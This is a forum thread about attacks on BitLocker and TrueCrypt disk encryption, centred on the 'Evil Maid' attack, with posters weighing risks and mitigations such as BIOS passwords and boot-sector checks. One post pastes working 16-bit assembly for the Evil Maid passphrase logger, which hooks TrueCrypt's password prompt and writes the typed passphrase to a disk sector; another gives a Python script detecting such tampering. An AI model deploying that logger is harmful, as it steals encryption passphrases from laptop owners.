
Vista and Win7 Bitlocker Busted (its official)

Comments

  • Closed Accounts Posts: 921 ✭✭✭mehmeh12


    Would this work on files encrypted with TrueCrypt?


  • Registered Users, Registered Users 2 Posts: 8,813 ✭✭✭BaconZombie


    No but the "Evil Maid Attack" does....


    I recently posted "Protect the Data" from Whom?. I wrote:

    [P]rivate citizens (and most organizations who are not nation-state actors) do not have a chance to win against a sufficiently motivated and resourced high-end threat.

    Joanna Rutkowska provides a great example of the importance of knowing the adversary in her post Evil Maid goes after TrueCrypt!, a follow-up to her January post Why do I miss Microsoft BitLocker?

    Her post describes how she and Alex Tereshkin implemented a physical attack against laptops with TrueCrypt full disk encryption. They implemented the attack (called "Evil Maid") as a bootable USB image that an intruder would use to boot a target laptop. Evil Maid hooks the TrueCrypt function that asks the user for a passphrase on boot, then stores the passphrase for later physical retrieval.

    The scenario is this:


    1. User leaves laptop alone in hotel room.

    2. Attacker enters room, boots laptop with Evil Maid, and compromises TrueCrypt loader. Attacker leaves.

    3. User returns to hotel room, boots laptop, enters TrueCrypt passphrase. Game over.

    4. User leaves laptop alone in hotel room again.

    5. Attacker enters room again, boots laptop with Evil Maid again, and retrieves passphrase.
    http://taosecurity.blogspot.com/2009/10/protect-data-from-evil-maid.html
    mehmeh12 wrote: »
    Would this work on files encrypted with TrueCrypt?


  • Closed Accounts Posts: 921 ✭✭✭mehmeh12


    OK, but in this case direct physical access is required to tamper with TrueCrypt. After being loaded onto the drive, would the antivirus software not detect Evil Maid and quarantine it?


  • Closed Accounts Posts: 35 Eddiethehill


    The Evil Maid at least takes two visits to the machine to work. First to infect the hard disk, and again to recover the password or just steal/seize the computer.

    This BitLocker attack just needs to get hold of the machine (I think, from what I have read).

    The bad news for us all is that if the software exists to do this (Passware v9.5) then anybody who wants it can get it easily via purchase or BitTorrent download, and they are ready to open up any BitLocker-protected machine.

    Bitlocker is advertised by Microsoft as a way of keeping your files secure. Not so any more, and this fact should be publicised.

    The Evil Maid could be kept at bay by setting the BIOS as password protected and the machine not bootable by any means other than the hard disk. Hopefully there is no backdoor BIOS password. Maybe epoxy up the USB slot(s) and CD player. Maybe epoxy in the hard drive to prevent tampering. The paranoia mounts - but if the machine is stolen without an EM attack beforehand then the data is secure.

    That seems to be the situation at the moment.

    As for myself, I will convert back to using TrueCrypt until I learn more.

    Is Mise...


  • Closed Accounts Posts: 35 Eddiethehill


    Now it gets worse: an Evil Maid-style attack against BitLocker, even if the PC has a TPM chip.

    http://testlab.sit.fraunhofer.de/content/output/project_results/bitlocker_skimming/

    The video shows how easy it is to infect a laptop in a few seconds. It would not show up as a bootkit either.

    It looks like, unless you can keep them under your control all the time, laptops are useless for keeping confidential information, no matter what you do.

    Sigh!


  • Closed Accounts Posts: 4 limewax


    "evil maid" attack... :rolleyes:

    [CODE]
    cpu 686
    use16
    segment .text

    GLOBAL Logger
    GLOBAL g_uLoggerCodeSize
    GLOBAL g_uCallAskPasswordDeltaOffset

    %define TC_BIOS_KEY_ENTER 1ch
    Logger: push bp
    mov bp, sp
    push word [bp+4]
    CallAskPassword:
    call $+3 ; will be patched to "call AskPassword"
    add sp, 2
    cmp al, TC_BIOS_KEY_ENTER
    jnz .exit
    ;typedef struct
    ;{
    ; unsigned __int32 Length;
    ; unsigned char Text[MAX_PASSWORD + 1];
    ; char Pad[3]; // keep 64-bit alignment
    ;} Password;
    push ax
    push es
    push ds
    pop es

    mov ax, 0301h ; write one sector
    mov cx, 62 ; number #61, disk offset 0x7a00
    mov dx, 0080h
    mov bx, word [bp+4] ; arg0
    int 13h
    pop es
    pop ax
    .exit: pop bp
    ret ; cdecl
    g_uLoggerCodeSize dw $-Logger
    g_uCallAskPasswordDeltaOffset dw CallAskPassword-Logger+1
    [/CODE]

    gee, that looks complicated :P
    *yawn*


  • Moderators, Recreation & Hobbies Moderators, Science, Health & Environment Moderators, Technology & Internet Moderators Posts: 93,593 Mod ✭✭✭✭Capt'n Midnight


    Unfortunately it's possible to put malware into BIOSes :( so not much you can do there.

    Otherwise, always do a cold boot (battery out, battery in sort of thing) and set the laptop to do a full boot each time to wipe the RAM on startup.

    It's always best to have two layers of encryption if you are really serious about it; it protects from stupid flaws in one system and, to a certain extent, from script kiddies.

    Perhaps you could boot from a CD and run checksums on the BIOS / start of HDD / RAM to verify they are untouched?


    But it's the old story of physical access, if someone has unrestricted access to the machine they probably own it.
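
    One way to carry out the "boot from a CD and checksum the start of the HDD" idea, as an added example that is not code from this thread or from any project: the unencrypted loader that an Evil Maid-style tool modifies lives in the first sectors of the disk, so a per-sector hash baseline taken while the machine was trusted (and kept on the read-only boot media, not on the laptop) shows exactly which sectors changed. The disk images below are constructed, not captured from a real drive.

```python
# Added example (not code from the thread or any project): per-sector integrity
# check of the unencrypted boot area (track 0) of a disk. Run it from trusted
# boot media and compare against a baseline stored off the machine.
import hashlib

SECTOR_SIZE = 512
BOOT_SECTORS = 63          # track 0: MBR plus the sectors a loader like TrueCrypt's uses


def sector_hashes(image: bytes, sectors: int = BOOT_SECTORS) -> list[str]:
    """SHA-256 of each of the first `sectors` 512-byte sectors of a raw disk image."""
    return [hashlib.sha256(image[i * SECTOR_SIZE:(i + 1) * SECTOR_SIZE]).hexdigest()
            for i in range(sectors)]


def verify_boot_area(image: bytes, baseline: list[str]) -> list[int]:
    """Return the indices of boot-area sectors whose hash differs from the baseline.
    An empty list means the unencrypted boot code is unchanged since the baseline."""
    current = sector_hashes(image, len(baseline))
    return [i for i, (old, new) in enumerate(zip(baseline, current)) if old != new]


def read_boot_area(device_path: str) -> bytes:
    """Read track 0 from a raw device (e.g. /dev/sda) while booted from trusted media."""
    with open(device_path, "rb") as dev:
        return dev.read(BOOT_SECTORS * SECTOR_SIZE)


# --- constructed sample data (not captured from a real disk) -----------------
def _constructed_disk() -> bytes:
    """A fake track 0: an MBR with the 0x55AA signature followed by filler loader code."""
    mbr = b"\xfa\xeb\xfe".ljust(510, b"\x90") + b"\x55\xaa"
    loader = bytes((i * 7) % 256 for i in range((BOOT_SECTORS - 1) * SECTOR_SIZE))
    return mbr + loader


CLEAN_IMAGE = _constructed_disk()
TRUSTED_BASELINE = sector_hashes(CLEAN_IMAGE)   # taken while the laptop was trusted

# Simulate an Evil Maid visit: the loader is hooked in sector 3, and sector 61
# (the slot the logger posted above writes to) later holds the captured passphrase.
_tampered = bytearray(CLEAN_IMAGE)
_tampered[3 * SECTOR_SIZE:3 * SECTOR_SIZE + 5] = b"\xe8\x00\x00\x90\x90"     # patched call
_tampered[61 * SECTOR_SIZE:61 * SECTOR_SIZE + 12] = b"\x08\x00\x00\x00hunter2\x00"
TAMPERED_IMAGE = bytes(_tampered)

if __name__ == "__main__":
    print("clean:", verify_boot_area(CLEAN_IMAGE, TRUSTED_BASELINE))        # []
    print("tampered:", verify_boot_area(TAMPERED_IMAGE, TRUSTED_BASELINE))  # [3, 61]
```

    A changed sector in the loader region means the boot code must not be trusted with a passphrase until it has been restored from known-good media; hashing the BIOS image itself needs a vendor-specific dump tool and is not covered here.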


  • Closed Accounts Posts: 18,056 ✭✭✭✭BostonB


    If the laptop or external disk is stolen though, the password will never be entered, so it's secure from that point of view, no?


  • Closed Accounts Posts: 35 Eddiethehill


    BostonB wrote: »
    If the laptop or external disk is stolen though, the password will never be entered, so it's secure from that point of view, no?

    Yes. A PC protected by full disk encryption which is stolen is considered safe. All the data on the hard disk, apart from the Master Boot Record (MBR), is encrypted so cannot be read.

    The Evil Maid attack is a way for a determined agent or agency (think industrial espionage, private detective, military etc.) to get you to enter the password into a PC AFTER it is infected, then steal/seize it.

    An opportunist thief just grabbing a PC and making away with it just gets a PC that cannot be booted up or read.

    The trouble is that if you are in possession of information on your laptop which has a big monetary/intelligence value, there will be someone looking to get their hands on it. The Evil Maid attacker takes little risk and could reap a big reward if successful.


  • Closed Accounts Posts: 18,056 ✭✭✭✭BostonB


    I would have thought all of this industrial espionage was quite rare. But at one place I worked a good few years back, someone pulled a mail server from the rack in a room with maybe 50 servers and got it out of the building. Obviously some insider help was required. But it opened my eyes.

